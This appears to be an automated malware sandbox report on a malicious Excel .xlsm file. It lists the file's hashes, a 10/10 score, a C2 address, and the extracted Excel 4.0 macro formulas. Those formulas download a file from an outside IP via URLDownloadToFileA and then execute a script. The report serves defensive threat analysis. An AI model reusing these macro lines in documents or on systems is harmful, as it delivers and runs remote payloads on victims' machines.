Overview

overview

10

Static

static

10

f97a55d7b9...0.xlsm

windows7-x64

10

f97a55d7b9...0.xlsm

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    f97a55d7b930da66d8a2ff8aff1aabc0

  • Size

    6KB

  • MD5

    f97a55d7b930da66d8a2ff8aff1aabc0

  • SHA1

    f906448331b2a3e95c61c115b5eb03c374b2b9f6

  • SHA256

    d5b1d2c227b68c58b8277c4f9045f67dc9241b7a6e28adf2103e3ee96666ae70

  • SHA512

    a351e0924c71bf917ed9ba18a3bb24b259f207a847bf16b2dcadd31da090eb1e8326aceb7018492c9eae8a8ff8438e37d0f59832d034396fc6abec6682495571

  • SSDEEP

    192:NDSauSgbrA2OmmfRb8UhHFBFYudb98yg6+A:NduVM2wp1FYgb98ygg

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • f97a55d7b930da66d8a2ff8aff1aabc0
    .xlsm office2007